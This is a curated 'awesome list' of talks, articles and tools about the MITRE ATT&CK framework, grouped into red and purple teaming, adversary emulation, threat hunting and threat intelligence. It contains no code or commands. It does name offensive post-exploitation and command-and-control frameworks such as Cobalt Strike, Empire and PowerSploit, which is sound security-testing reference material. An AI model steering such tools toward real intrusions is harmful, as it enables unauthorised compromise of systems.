Awesome Mitre ATT&CK™ Framework
A curated list of awesome resources related to Mitre ATT&CK™ Framework
Contents
Red and Purple Team
Resources
- MITRE ATT&CK™ Evaluations Round 1 - APT3
- Getting Started with ATT&CK: Adversary Emulation and Red Teaming
- Adversary Emulation Plans
- The Threat Emulation Problem
- Why we love threat emulation exercises (and how to get started with one of your own)
- MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary to Create Better Detections, David Herrald and Ryan Kovar, Splunk
- Living Off The Land Binaries and Scripts (and also Libraries)
- Purple Teaming with Vectr, Cobalt Strike, and MITRE ATT&CK
- Red Team Use of MITRE ATT&CK
- Purple Teaming with ATT&CK - x33fcon 2018
- Live Adversary Simulation: Red and Blue Team Tactics
- MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with ATT&CK, David Middlehurst, Trustwave
- MITRE ATT&CKcon 2018: From Red VS Blue to Red
♥ Blue, Olaf Hartong and Vincent Van Mieghem, Deloitte - PowerShell for Practical Purple Teaming
- Signal the ATT&CK: Part 1
- Signal the ATT&CK: Part 2
Tools
Red Team
- Cobalt Strike - Software for Adversary Simulations and Red Team Operations
- PoshC2 - PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement.
- Empire - Post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
- PowerSploit - Collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- Invoke-PSImage - Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image.
Purple Team
- RE:TERNAL - RE:TERNAL is a centralised purple team simulation platform. Reternal uses agents installed on a simulation network to execute various known red-teaming techniques in order to test blue-teaming capabilities.
- Purple Team ATT&CK Automation - Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
- VECTR - VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
- Mordor - The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption.
Adversary Emulation
- MITRE CALDERA - CALDERA is an automated adversary emulation system, built on the MITRE ATT&CK™ framework.
- Atomic Red Team - Small and highly portable detection tests based on MITRE's ATT&CK.
- Metta - An information security preparedness tool to do adversarial simulation.
- Red Team Automation (RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
Threat Hunting
Resources
- MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, SpecterOps and Jose Luis Rodriguez, Student
- Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32
- Ten Ways Zeek Can Help You Detect the TTPs of MITRE ATT&CK
- SEC1244 - Cops and Robbers: Simulating the Adversary to Test Your Splunk Security Analytics
- Mapping your Blue Team to MITRE ATT&CK™
- Quantify Your Hunt: Not Your Parent’s Red Teaming Redux
- Post-Exploitation Hunting with ATT&CK & Elastic
- ThreatHunter-Playbook
- How MITRE ATT&CK helps security operations
- MITRE Cyber Analytics Repository
- MITRE ATT&CK Windows Logging Cheat Sheets
- Defensive Gap Assessment with MITRE ATT&CK
- Prioritizing the Remediation of Mitre ATT&CK Framework Gaps
- Finding Related ATT&CK Techniques
- Getting Started with ATT&CK: Detection and Analytics
- 2019 Threat Detection Report
- A Process is No One : Hunting for Token Manipulation
Tools
- osquery-attck - Mapping the MITRE ATT&CK Matrix with Osquery
- ATTACKdatamap - A datasource assessment on an event level to show potential coverage or the MITRE ATT&CK framework
- Splunk Mitre ATT&CK App - A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
- auditd-attack - A Linux Auditd rule set mapped to MITRE's Attack Framework
- DeTTACT - DeTT&CT aims to assist blue teams using ATT&CK to score and compare data log source quality, visibility coverage, detection coverage and threat actor behaviours.
- HELK - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- Sigma - Generic Signature Format for SIEM Systems
- atomic-threat-coverage - Automatically generated actionable analytics designed to combat threats based on MITRE's ATT&CK.
- CyberMenace - A one stop shop hunting app in Splunk that can ingest Zeek, Suricata, Sysmon, and Windows event data to find malicious indicators of compromise relating to the MITRE ATT&CK Matrix.
- Wayfinder - Artificial Intelligence Agent to extract threat intelligence TTPs from feeds of malicious and benign event sources and automate threat hunting activities.
- pyattck - A python package to interact with the Mitre ATT&CK Framework. You can find documentation here
Threat Intelligence
Resources
- FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
- Getting Started with ATT&CK: Threat Intelligence
- Using ATT&CK to Advance Cyber Threat Intelligence — Part 1
- Using ATT&CK to Advance Cyber Threat Intelligence — Part 2
- ATT&CKing the Status Quo: ThreatBased Adversary Emulation with MITRE ATT&CK™
Tools
- cti - Cyber Threat Intelligence Repository expressed in STIX 2.0
- TALR - A public repository for the collection and sharing of detection rules in STIX format.
Community
License
To the extent possible under law, Rahmat Nurfauzi "@infosecn1nja" has waived all copyright and related or neighboring rights to this work.